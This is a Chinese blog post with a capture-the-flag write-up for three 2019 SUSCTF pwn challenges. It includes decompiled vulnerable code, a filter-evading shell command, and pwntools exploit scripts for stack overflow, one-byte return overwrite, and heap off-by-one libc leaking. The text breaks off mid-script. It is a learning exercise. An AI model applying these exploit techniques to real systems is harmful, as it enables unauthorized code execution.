<!DOCTYPE html>
<html  lang="zh">
<head>
    <meta charset="utf-8" />

<meta name="generator" content="Hexo 3.9.0" />

<meta name="viewport" content="width=device-width, initial-scale=1, maximum-scale=1" />

<title>2019 SUSCTF PWN - Mask&#39;s blogs</title>


    <meta name="description" content="有幸去到东南大学参加这个比赛，这算是我参加的第一个比较正式的比赛，这是四月份的比赛了，当时实力不够，pwn只做出了两道题，还是比较简单的，另外两道有关堆的题目不会做，后来学习了一下堆的管理机制，现在终于这两道题做完了 checkin题目分析123456789101112131415161718int __cdecl main(int argc, const char **argv, const c">
<meta name="keywords" content="pwn,stack,libc">
<meta property="og:type" content="article">
<meta property="og:title" content="2019 SUSCTF PWN">
<meta property="og:url" content="Mask6asok.github.io/2019/07/20/2019 SUSCTF PWN.html">
<meta property="og:site_name" content="Mask&#39;s blogs">
<meta property="og:description" content="有幸去到东南大学参加这个比赛，这算是我参加的第一个比较正式的比赛，这是四月份的比赛了，当时实力不够，pwn只做出了两道题，还是比较简单的，另外两道有关堆的题目不会做，后来学习了一下堆的管理机制，现在终于这两道题做完了 checkin题目分析123456789101112131415161718int __cdecl main(int argc, const char **argv, const c">
<meta property="og:locale" content="zh-CN">
<meta property="og:image" content="/images/og_image.png">
<meta property="og:updated_time" content="2019-07-20T16:06:15.811Z">
<meta name="twitter:card" content="summary">
<meta name="twitter:title" content="2019 SUSCTF PWN">
<meta name="twitter:description" content="有幸去到东南大学参加这个比赛，这算是我参加的第一个比较正式的比赛，这是四月份的比赛了，当时实力不够，pwn只做出了两道题，还是比较简单的，另外两道有关堆的题目不会做，后来学习了一下堆的管理机制，现在终于这两道题做完了 checkin题目分析123456789101112131415161718int __cdecl main(int argc, const char **argv, const c">
<meta name="twitter:image" content="/images/og_image.png">







<link rel="icon" href="/images/favicon.svg">


<link rel="stylesheet" href="https://cdn.jsdelivr.net/npm/bulma@0.7.2/css/bulma.css">
<link rel="stylesheet" href="https://use.fontawesome.com/releases/v5.4.1/css/all.css">
<link rel="stylesheet" href="https://fonts.googleapis.com/css?family=Ubuntu:400,600|Source+Code+Pro">
<link rel="stylesheet" href="https://cdn.jsdelivr.net/npm/highlight.js@9.12.0/styles/atom-one-light.css">


    
    
<style>body>.footer,body>.navbar,body>.section{opacity:0}</style>

    
    
<link rel="stylesheet" href="https://cdn.jsdelivr.net/npm/lightgallery@1.6.8/dist/css/lightgallery.min.css">
<link rel="stylesheet" href="https://cdn.jsdelivr.net/npm/justifiedGallery@3.7.0/dist/css/justifiedGallery.min.css">

    
    
<link rel="stylesheet" href="https://cdn.jsdelivr.net/npm/outdatedbrowser@1.1.5/outdatedbrowser/outdatedbrowser.min.css">

    
    
    
    
<link rel="stylesheet" href="/css/back-to-top.css">

    
    
    
    
    
    
    
    <link rel="stylesheet" href="/css/progressbar.css">
<script src="https://cdn.jsdelivr.net/npm/pace-js@1.0.2/pace.min.js"></script>
    
    
    


<link rel="stylesheet" href="/css/style.css">
</head>
<body class="is-3-column">
    <nav class="navbar navbar-main">
    <div class="container">
        <div class="navbar-brand is-flex-center">
            <a class="navbar-item navbar-logo" href="/">
            
                <img src="/images/logo.ico" alt="2019 SUSCTF PWN" height="28">
            
            </a>
        </div>
        <div class="navbar-menu">
            
            <div class="navbar-start">
                
                <a class="navbar-item"
                href="/">Home</a>
                
                <a class="navbar-item"
                href="/archives">Archives</a>
                
                <a class="navbar-item"
                href="/categories">Categories</a>
                
                <a class="navbar-item"
                href="/tags">Tags</a>
                
                <a class="navbar-item"
                href="/about">About</a>
                
            </div>
            
            <div class="navbar-end">
                
                
                
                <a class="navbar-item search" title="搜索" href="javascript:;">
                    <i class="fas fa-search"></i>
                </a>
                
            </div>
        </div>
    </div>
</nav>
    
    <section class="section">
        <div class="container">
            <div class="columns">
                <div class="column is-8-tablet is-8-desktop is-6-widescreen has-order-2 column-main">
<div class="card">
    
    <div class="card-content article ">
        
        <div class="level article-meta is-size-7 is-uppercase is-mobile is-overflow-x-auto">
            <div class="level-left">
                <time class="level-item has-text-grey" datetime="2019-07-20T04:45:25.000Z">2019-07-20</time>
                
                <div class="level-item">
                <a class="has-link-grey -link" href="/categories/Pwn/">Pwn</a>
                </div>
                
                
                <span class="level-item has-text-grey">
                    
                    
                    17 分钟 读完 (大约 2606 个字)
                </span>
                
                
            </div>
        </div>
        
        <h1 class="title is-size-3 is-size-4-mobile has-text-weight-normal">
            
                2019 SUSCTF PWN
            
        </h1>
        <div class="content">
            <p>有幸去到东南大学参加这个比赛，这算是我参加的第一个比较正式的比赛，这是四月份的比赛了，当时实力不够，pwn只做出了两道题，还是比较简单的，另外两道有关堆的题目不会做，后来学习了一下堆的管理机制，现在终于这两道题做完了</p>
<h2 id="checkin"><a href="#checkin" class="headerlink" title="checkin"></a>checkin</h2><h3 id="题目分析"><a href="#题目分析" class="headerlink" title="题目分析"></a>题目分析</h3><figure class="highlight c"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br></pre></td><td class="code"><pre><span class="line"><span class="keyword">int</span> __<span class="function">cdecl <span class="title">main</span><span class="params">(<span class="keyword">int</span> argc, <span class="keyword">const</span> <span class="keyword">char</span> **argv, <span class="keyword">const</span> <span class="keyword">char</span> **envp)</span></span></span><br><span class="line"><span class="function"></span>&#123;</span><br><span class="line">  <span class="keyword">char</span> buf; <span class="comment">// [rsp+10h] [rbp-20h]</span></span><br><span class="line">  <span class="keyword">unsigned</span> __int64 v5; <span class="comment">// [rsp+28h] [rbp-8h]</span></span><br><span class="line"></span><br><span class="line">  v5 = __readfsqword(<span class="number">0x28</span>u);</span><br><span class="line">  init(*(_QWORD *)&amp;argc, argv, envp);</span><br><span class="line">  banner();</span><br><span class="line">  <span class="built_in">puts</span>(<span class="string">"input your cmd to check in QAQ\n&gt;"</span>);</span><br><span class="line">  read(<span class="number">0</span>, &amp;buf, <span class="number">0x10</span>uLL);</span><br><span class="line">  <span class="keyword">if</span> ( <span class="built_in">strstr</span>(&amp;buf, <span class="string">"sh"</span>) )</span><br><span class="line">  &#123;</span><br><span class="line">    <span class="built_in">puts</span>(<span class="string">"you can't input sh"</span>);</span><br><span class="line">    <span class="built_in">exit</span>(<span class="number">0</span>);</span><br><span class="line">  &#125;</span><br><span class="line">  system(&amp;buf);</span><br><span class="line">  <span class="keyword">return</span> __readfsqword(<span class="number">0x28</span>u) ^ v5;</span><br><span class="line">&#125;</span><br></pre></td></tr></table></figure>
<p>题目很简单，就是一个签到题，利用system函数调用你输入的指令，这里把sh屏蔽了，直接在sh之间插入一些其他东西即可跳过</p>
<h3 id="EXP"><a href="#EXP" class="headerlink" title="EXP"></a>EXP</h3><figure class="highlight c"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">/bin/s``h</span><br></pre></td></tr></table></figure>
<h2 id="retmoon"><a href="#retmoon" class="headerlink" title="retmoon"></a>retmoon</h2><h3 id="题目分析-1"><a href="#题目分析-1" class="headerlink" title="题目分析"></a>题目分析</h3><p>一道栈溢出，漏洞出现在这里</p>
<figure class="highlight c"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br></pre></td><td class="code"><pre><span class="line"><span class="keyword">unsigned</span> __<span class="function">int64 <span class="title">sub_B49</span><span class="params">()</span></span></span><br><span class="line"><span class="function"></span>&#123;</span><br><span class="line">  <span class="keyword">char</span> v1; <span class="comment">// [rsp+7h] [rbp-39h]</span></span><br><span class="line">  <span class="keyword">char</span> *v2; <span class="comment">// [rsp+8h] [rbp-38h]</span></span><br><span class="line">  <span class="keyword">char</span> buf[<span class="number">40</span>]; <span class="comment">// [rsp+10h] [rbp-30h]</span></span><br><span class="line">  <span class="keyword">char</span> _20[<span class="number">40</span>]; <span class="comment">// [rsp+20h] [rbp-20h]</span></span><br><span class="line">  <span class="keyword">unsigned</span> __int64 v5; <span class="comment">// [rsp+38h] [rbp-8h]</span></span><br><span class="line"></span><br><span class="line">  v5 = __readfsqword(<span class="number">0x28</span>u);</span><br><span class="line">  v2 = _20;</span><br><span class="line">  <span class="built_in">puts</span>(<span class="string">"you can say someing before you wake"</span>);</span><br><span class="line">  read(<span class="number">0</span>, buf, <span class="number">0x50</span>uLL); <span class="comment">// 溢出</span></span><br><span class="line">  <span class="built_in">puts</span>(<span class="string">"one more word"</span>);</span><br><span class="line">  read(<span class="number">0</span>, &amp;v1, <span class="number">1u</span>LL);</span><br><span class="line">  buf[*(<span class="keyword">signed</span> <span class="keyword">int</span> *)v2] = v1;<span class="comment">// 溢出</span></span><br><span class="line">  <span class="keyword">return</span> __readfsqword(<span class="number">0x28</span>u) ^ v5;</span><br><span class="line">&#125;</span><br></pre></td></tr></table></figure>
<p>程序本身带有getshell函数</p>
<figure class="highlight c"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br></pre></td><td class="code"><pre><span class="line"><span class="keyword">unsigned</span> __<span class="function">int64 <span class="title">sub_AE8</span><span class="params">()</span></span></span><br><span class="line"><span class="function"></span>&#123;</span><br><span class="line">  <span class="keyword">char</span> buf; <span class="comment">// [rsp+7h] [rbp-9h]</span></span><br><span class="line">  <span class="keyword">unsigned</span> __int64 v2; <span class="comment">// [rsp+8h] [rbp-8h]</span></span><br><span class="line"></span><br><span class="line">  v2 = __readfsqword(<span class="number">0x28</span>u);</span><br><span class="line">  <span class="built_in">printf</span>(<span class="string">"Are you ready to leave earth to the moon?(y or n)\n&gt;"</span>);</span><br><span class="line">  read(<span class="number">0</span>, &amp;buf, <span class="number">1u</span>LL);</span><br><span class="line">  system(<span class="string">"/bin/sh"</span>);</span><br><span class="line">  <span class="keyword">return</span> __readfsqword(<span class="number">0x28</span>u) ^ v2;</span><br><span class="line">&#125;</span><br></pre></td></tr></table></figure>
<p>所以可以考虑劫持返回地址，程序带有canary保护，所以不能直接在第一输入就覆盖，但是第一次输入可以覆盖_20这个变量，导致v2可以被控制，从而在第二次输入的时候可以以buf为基址，以v2为偏移的地方写入一个字节，这里原本的返回地址为0xAC0，而getshell地址为0xAE8，所以这里直接往低位写入一个0xE8即可</p>
<h3 id="EXP-1"><a href="#EXP-1" class="headerlink" title="EXP"></a>EXP</h3><figure class="highlight python"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br></pre></td><td class="code"><pre><span class="line"><span class="keyword">from</span> pwn <span class="keyword">import</span> *</span><br><span class="line">context.log_level = <span class="string">'debug'</span></span><br><span class="line">p = remote(<span class="string">'211.65.197.117'</span>, <span class="number">10006</span>)</span><br><span class="line">p.recv()</span><br><span class="line">p.send(<span class="string">'a'</span>*<span class="number">16</span>+p64(<span class="number">0x38</span>)) <span class="comment"># 0x38是buf与返回地址直接的偏移</span></span><br><span class="line">p.recv()</span><br><span class="line">p.send(p64(<span class="number">0xe8</span>))</span><br><span class="line">p.interactive()</span><br></pre></td></tr></table></figure>
<h2 id="pwn-collection"><a href="#pwn-collection" class="headerlink" title="pwn_collection"></a>pwn_collection</h2><h3 id="题目分析-2"><a href="#题目分析-2" class="headerlink" title="题目分析"></a>题目分析</h3><p>这算是一道heap与stack相结合的题目吧，当时完全不懂堆的利用，所以没做，其实也是挺简单的</p>
<p>开始是一个用户注册删除登陆系统</p>
<blockquote>
<ol>
<li>registry</li>
<li>login</li>
<li>delete user</li>
<li>exit</li>
</ol>
</blockquote>
<p>这里的注册会申请两个堆块来保存用户名和密码</p>
<figure class="highlight c"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br></pre></td><td class="code"><pre><span class="line"><span class="function"><span class="keyword">int</span> <span class="title">registry</span><span class="params">()</span></span></span><br><span class="line"><span class="function"></span>&#123;</span><br><span class="line">  <span class="keyword">int</span> v0; <span class="comment">// ebx</span></span><br><span class="line">  <span class="keyword">int</span> v1; <span class="comment">// ebx</span></span><br><span class="line"></span><br><span class="line">  v0 = chunk_count;</span><br><span class="line">  chunk_tab[<span class="number">2</span> * v0] = <span class="built_in">malloc</span>(<span class="number">0x14</span>uLL);</span><br><span class="line">  <span class="built_in">puts</span>(<span class="string">"now you can create a user"</span>);</span><br><span class="line">  <span class="built_in">printf</span>(<span class="string">"input your name(no more than 20)\n&gt;"</span>);</span><br><span class="line">  my_read((<span class="keyword">void</span> *)chunk_tab[<span class="number">2</span> * chunk_count], <span class="number">0x14</span>uLL);</span><br><span class="line">  v1 = chunk_count;</span><br><span class="line">  chunk_tab[<span class="number">2</span> * v1 + <span class="number">1</span>] = <span class="built_in">malloc</span>(<span class="number">0x20</span>uLL);</span><br><span class="line">  <span class="built_in">printf</span>(<span class="string">"input password\n&gt;"</span>, <span class="number">20L</span>L);</span><br><span class="line">  __isoc99_scanf(<span class="string">"%s"</span>, chunk_tab[<span class="number">2</span> * chunk_count + <span class="number">1</span>]); <span class="comment">//这里存在溢出？没利用过</span></span><br><span class="line">  ++chunk_count;</span><br><span class="line">  <span class="keyword">return</span> <span class="built_in">puts</span>(<span class="string">"registry complete"</span>);</span><br><span class="line">&#125;</span><br></pre></td></tr></table></figure>
<p>删除用户的时候可能会有UAF</p>
<figure class="highlight c"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br></pre></td><td class="code"><pre><span class="line"><span class="function"><span class="keyword">int</span> <span class="title">delete</span><span class="params">()</span></span></span><br><span class="line"><span class="function"></span>&#123;</span><br><span class="line">  <span class="keyword">int</span> v1; <span class="comment">// [rsp+Ch] [rbp-4h]</span></span><br><span class="line"></span><br><span class="line">  v1 = <span class="number">0</span>;</span><br><span class="line">  <span class="built_in">puts</span>(<span class="string">"input your index"</span>);</span><br><span class="line">  __isoc99_scanf(<span class="string">"%d"</span>, &amp;v1);</span><br><span class="line">  <span class="keyword">if</span> ( v1 &gt;= chunk_count )</span><br><span class="line">    <span class="keyword">return</span> <span class="built_in">puts</span>(<span class="string">"idx &gt; num"</span>);</span><br><span class="line">  <span class="built_in">free</span>((<span class="keyword">void</span> *)chunk_tab[<span class="number">2</span> * v1]);              <span class="comment">// uaf</span></span><br><span class="line">  <span class="built_in">free</span>((<span class="keyword">void</span> *)chunk_tab[<span class="number">2</span> * v1 + <span class="number">1</span>]);</span><br><span class="line">  --chunk_count;</span><br><span class="line">  <span class="keyword">return</span> <span class="built_in">puts</span>(<span class="string">"ok"</span>);</span><br><span class="line">&#125;</span><br></pre></td></tr></table></figure>
<p>而在登陆的时候，存在栈溢出</p>
<figure class="highlight c"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br></pre></td><td class="code"><pre><span class="line"><span class="function"><span class="keyword">int</span> <span class="title">login</span><span class="params">()</span></span></span><br><span class="line"><span class="function"></span>&#123;</span><br><span class="line">  <span class="keyword">int</span> result; <span class="comment">// eax</span></span><br><span class="line">  <span class="keyword">char</span> v1; <span class="comment">// [rsp+0h] [rbp-30h]</span></span><br><span class="line">  <span class="keyword">int</span> v2; <span class="comment">// [rsp+2Ch] [rbp-4h]</span></span><br><span class="line"></span><br><span class="line">  v2 = <span class="number">0</span>;</span><br><span class="line">  <span class="built_in">puts</span>(<span class="string">"input your index"</span>);</span><br><span class="line">  __isoc99_scanf(<span class="string">"%d"</span>, &amp;v2);</span><br><span class="line">  <span class="built_in">printf</span>(<span class="string">"input your password\n&gt;"</span>, &amp;v2);</span><br><span class="line">  my_read(&amp;v1, <span class="number">0x50</span>uLL);                        <span class="comment">// 栈溢出</span></span><br><span class="line">  result = check_login(&amp;v1, (_BYTE *)chunk_tab[<span class="number">2</span> * v2 + <span class="number">1</span>]);</span><br><span class="line">  <span class="keyword">if</span> ( result == <span class="number">1</span> )</span><br><span class="line">  &#123;</span><br><span class="line">    <span class="built_in">puts</span>(<span class="string">"login ok"</span>);</span><br><span class="line">    result = note();</span><br><span class="line">  &#125;</span><br><span class="line">  <span class="keyword">return</span> result;</span><br><span class="line">&#125;</span><br></pre></td></tr></table></figure>
<p>这里的栈溢出可以修改返回地址，且没有Canary保护</p>
<p>程序中没有getshell的地址，所以考虑ret2libc，这就需要知道libc的基址</p>
<p>login进入后到达另一个管理，note的申请释放与打印，这里就是有关堆的操作</p>
<blockquote>
<p>————-note-menu———-</p>
<ol>
<li>add note</li>
<li>check note</li>
<li>delete note</li>
<li>return</li>
</ol>
</blockquote>
<p>在add note的时候，chunk大小有限制，只能申请fastbin范围的chunk，不过存在一个off by one</p>
<figure class="highlight c"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br></pre></td><td class="code"><pre><span class="line"><span class="function"><span class="keyword">int</span> <span class="title">add_note</span><span class="params">()</span></span></span><br><span class="line"><span class="function"></span>&#123;</span><br><span class="line">  <span class="keyword">int</span> v1; <span class="comment">// ebx</span></span><br><span class="line">  <span class="keyword">int</span> v2; <span class="comment">// [rsp+Ch] [rbp-14h]</span></span><br><span class="line"></span><br><span class="line">  <span class="keyword">if</span> ( note_count &gt; <span class="number">19</span> )</span><br><span class="line">    <span class="keyword">return</span> <span class="built_in">puts</span>(<span class="string">"notes are too many"</span>);</span><br><span class="line">  <span class="built_in">puts</span>(<span class="string">"input your note length"</span>);</span><br><span class="line">  __isoc99_scanf(<span class="string">"%d"</span>, &amp;v2);</span><br><span class="line">  <span class="keyword">if</span> ( v2 &gt; <span class="number">0x5F</span> )                              <span class="comment">// chunk size limit</span></span><br><span class="line">    <span class="keyword">return</span> <span class="built_in">puts</span>(<span class="string">"too big"</span>);</span><br><span class="line">  v1 = note_count;                              <span class="comment">// 新申请的chunk总是记录在尾部</span></span><br><span class="line">  (&amp;ptr)[v1] = (<span class="keyword">char</span> *)<span class="built_in">malloc</span>(v2);</span><br><span class="line">  <span class="built_in">puts</span>(<span class="string">"input your note"</span>);</span><br><span class="line">  my_read((&amp;ptr)[note_count], v2 + <span class="number">1</span>);          <span class="comment">// off by one</span></span><br><span class="line">  ++note_count;</span><br><span class="line">  <span class="keyword">return</span> <span class="built_in">puts</span>(<span class="string">"adding ok"</span>);</span><br><span class="line">&#125;</span><br></pre></td></tr></table></figure>
<p>这里通过自己实现的read函数输入，所幸没有null byte截断</p>
<figure class="highlight c"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br></pre></td><td class="code"><pre><span class="line"><span class="keyword">ssize_t</span> __<span class="function">fastcall <span class="title">my_read</span><span class="params">(<span class="keyword">void</span> *ptr, <span class="keyword">size_t</span> lenth)</span></span></span><br><span class="line"><span class="function"></span>&#123;</span><br><span class="line">  <span class="keyword">ssize_t</span> result; <span class="comment">// rax</span></span><br><span class="line"></span><br><span class="line">  result = read(<span class="number">0</span>, ptr, lenth);</span><br><span class="line">  <span class="keyword">if</span> ( (<span class="keyword">signed</span> <span class="keyword">int</span>)result &lt;= <span class="number">0</span> )</span><br><span class="line">  &#123;</span><br><span class="line">    <span class="built_in">puts</span>(<span class="string">"Error"</span>);</span><br><span class="line">    _exit(<span class="number">-1</span>);</span><br><span class="line">  &#125;</span><br><span class="line">  <span class="keyword">return</span> result;</span><br><span class="line">&#125;</span><br></pre></td></tr></table></figure>
<p>check函数可以打印chunk内容</p>
<figure class="highlight c"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br></pre></td><td class="code"><pre><span class="line"><span class="function"><span class="keyword">int</span> <span class="title">check_note</span><span class="params">()</span></span></span><br><span class="line"><span class="function"></span>&#123;</span><br><span class="line">  <span class="keyword">int</span> result; <span class="comment">// eax</span></span><br><span class="line">  <span class="keyword">int</span> v1; <span class="comment">// [rsp+Ch] [rbp-4h]</span></span><br><span class="line"></span><br><span class="line">  <span class="built_in">puts</span>(<span class="string">"input your note idx"</span>);</span><br><span class="line">  __isoc99_scanf(<span class="string">"%d"</span>, &amp;v1);</span><br><span class="line">  <span class="keyword">if</span> ( v1 &lt; note_count )</span><br><span class="line">    result = <span class="built_in">printf</span>((&amp;ptr)[v1], &amp;v1);           <span class="comment">// 存在格式化字符串漏洞可利用吗？</span></span><br><span class="line">  <span class="keyword">else</span></span><br><span class="line">    result = <span class="built_in">puts</span>(<span class="string">"too big idx"</span>);</span><br><span class="line">  <span class="keyword">return</span> result;</span><br><span class="line">&#125;</span><br></pre></td></tr></table></figure>
<p>delete函数free相应的chunk，指针未置0，存在uaf，但是其堆块的申请总是放到最后一个位置，<del>也许不能利用uaf</del>  可以利用一些多余chunk隔开，可以形成 double free ，具体没利用</p>
<figure class="highlight c"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br></pre></td><td class="code"><pre><span class="line"><span class="function"><span class="keyword">int</span> <span class="title">delete_note</span><span class="params">()</span></span></span><br><span class="line"><span class="function"></span>&#123;</span><br><span class="line">  <span class="keyword">int</span> v1; <span class="comment">// [rsp+Ch] [rbp-4h]</span></span><br><span class="line"></span><br><span class="line">  <span class="built_in">puts</span>(<span class="string">"input your note idx"</span>);</span><br><span class="line">  __isoc99_scanf(<span class="string">"%d"</span>, &amp;v1);</span><br><span class="line">  <span class="keyword">if</span> ( v1 &gt;= note_count )</span><br><span class="line">    <span class="keyword">return</span> <span class="built_in">puts</span>(<span class="string">"too big idx"</span>);</span><br><span class="line">  <span class="built_in">free</span>((&amp;ptr)[v1]);</span><br><span class="line">  --note_count;</span><br><span class="line">  <span class="keyword">return</span> <span class="built_in">puts</span>(<span class="string">"free ok"</span>);</span><br><span class="line">&#125;</span><br></pre></td></tr></table></figure>
<p>那么如何利用heap来泄漏libc就是关键所在了</p>
<p>在非fastbin的chunk被free的时候，都会先进入unsortedbin，在 unsortedbin中的第一个chunk的fd与bk会指向main_arena的某个位置，main_arena也放在libc中，与libc的基址的偏移可以在malloc_trim函数中找到，若是我们能得到这个unsortedbin中的chunk的fd或者bk指针的值，我们就能计算出libc的基址，从而找到one_gadget</p>
<p>由于忘记当时题目有没有给出libc，没有的话这里偏移地址不好搞，所以这里以我本地libc为例，并且假设我已经或者该libc</p>
<p>因为这里申请的chunk都是在fastbin范围的，因此被free后会进入fastbin而不是unsortedbin，因此我们得想办法构造一个fake chunk，其size不在fastbin中，并且将其free，从而进入到unsortedbin</p>
<p>我们可以利用一个off by one修改next chunk的size值的低位，将其改成0x91（fastbin最大为0x80），并且free next chunk，他就会进入到unsortedbin中，这里要注意好堆块的伪造和预防与top chunk合并</p>
<p>我们可以先申请四个块ABCD，其中BC块的size之和为0x90，并且利用A块溢出修改B块的size为0x91，free B块，这样BC块就会合并放到unsortedbin中，此时再malloc一个最小块E（0x10）并且写上8个字符，这样E的内容中，前8个为输入的字符，后8个会遗留libc的地址，利用check功能可以打印出来，从而计算出libc基址</p>
<p>再退回到上级管理，重新login，利用栈溢出修改返回地址为one_gadget，即可getshell</p>
<h3 id="EXP-2"><a href="#EXP-2" class="headerlink" title="EXP"></a>EXP</h3><figure class="highlight python"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br><span class="line">31</span><br><span class="line">32</span><br><span class="line">33</span><br><span class="line">34</span><br><span class="line">35</span><br><span class="line">36</span><br><span class="line">37</span><br><span class="line">38</span><br><span class="line">39</span><br><span class="line">40</span><br><span class="line">41</span><br><span class="line">42</span><br><span class="line">43</span><br><span class="line">44</span><br><span class="line">45</span><br><span class="line">46</span><br><span class="line">47</span><br><span class="line">48</span><br><span class="line">49</span><br><span class="line">50</span><br></pre></td><td class="code"><pre><span class="line"><span class="keyword">from</span> pwn <span class="keyword">import</span> *</span><br><span class="line">p = process(<span class="string">"./pwn_collection"</span>)</span><br><span class="line">e = ELF(<span class="string">"./pwn_collection"</span>)</span><br><span class="line">libc = ELF(<span class="string">"/lib/x86_64-linux-gnu/libc-2.23.so"</span>)</span><br><span class="line">p.sendlineafter(<span class="string">"&gt;"</span>, <span class="string">'1'</span>)</span><br><span class="line">p.sendlineafter(<span class="string">"&gt;"</span>, <span class="string">'1'</span>)</span><br><span class="line">p.sendlineafter(<span class="string">"&gt;"</span>, <span class="string">'1'</span>)</span><br><span class="line"><span class="comment">##context.log_level = 'debug'</span></span><br><span class="line">p.sendlineafter(<span class="string">"&gt;"</span>, <span class="string">'2'</span>)</span><br><span class="line">p.sendlineafter(<span class="string">"index\n"</span>, <span class="string">'0'</span>)</span><br><span class="line">p.sendlineafter(<span class="string">"&gt;"</span>, <span class="string">'1'</span>)</span><br><span class="line"></span><br><span class="line"></span><br><span class="line"><span class="function"><span class="keyword">def</span> <span class="title">add</span><span class="params">(len, cont)</span>:</span></span><br><span class="line">    p.sendlineafter(<span class="string">"chioce&gt;"</span>, <span class="string">'1'</span>)</span><br><span class="line">    p.sendlineafter(<span class="string">"length\n"</span>, str(len))</span><br><span class="line">    p.sendlineafter(<span class="string">"note\n"</span>, cont)</span><br><span class="line"></span><br><span class="line"></span><br><span class="line"><span class="function"><span class="keyword">def</span> <span class="title">check</span><span class="params">(idx)</span>:</span></span><br><span class="line">    p.sendlineafter(<span class="string">"chioce&gt;"</span>, <span class="string">'2'</span>)</span><br><span class="line">    p.sendlineafter(<span class="string">"idx\n"</span>, str(idx))</span><br><span class="line"></span><br><span class="line"></span><br><span class="line"><span class="function"><span class="keyword">def</span> <span class="title">delete</span><span class="params">(idx)</span>:</span></span><br><span class="line">    p.sendlineafter(<span class="string">"chioce&gt;"</span>, <span class="string">'3'</span>)</span><br><span class="line">    p.sendlineafter(<span class="string">"idx\n"</span>, str(idx))</span><br><span class="line"></span><br><span class="line"></span><br><span class="line">add(<span class="number">0x18</span>, <span class="string">'0'</span>)</span><br><span class="line">add(<span class="number">0x58</span>, <span class="string">'1'</span>)</span><br><span class="line">add(<span class="number">0x28</span>, <span class="string">'2'</span>)</span><br><span class="line">add(<span class="number">0x18</span>, <span class="string">'3'</span>)</span><br><span class="line"></span><br><span class="line">delete(<span class="number">0</span>)</span><br><span class="line">add(<span class="number">0x18</span>, <span class="string">'0'</span> * <span class="number">0x18</span> + <span class="string">'\x91'</span>)</span><br><span class="line">delete(<span class="number">1</span>)</span><br><span class="line">add(<span class="number">0x48</span>, <span class="string">'1'</span> * <span class="number">7</span>)</span><br><span class="line"></span><br><span class="line">check(<span class="number">1</span>)</span><br><span class="line">p.recvuntil(<span class="string">'\n'</span>)</span><br><span class="line">libc_base = u64(p.recv(<span class="number">6</span>) 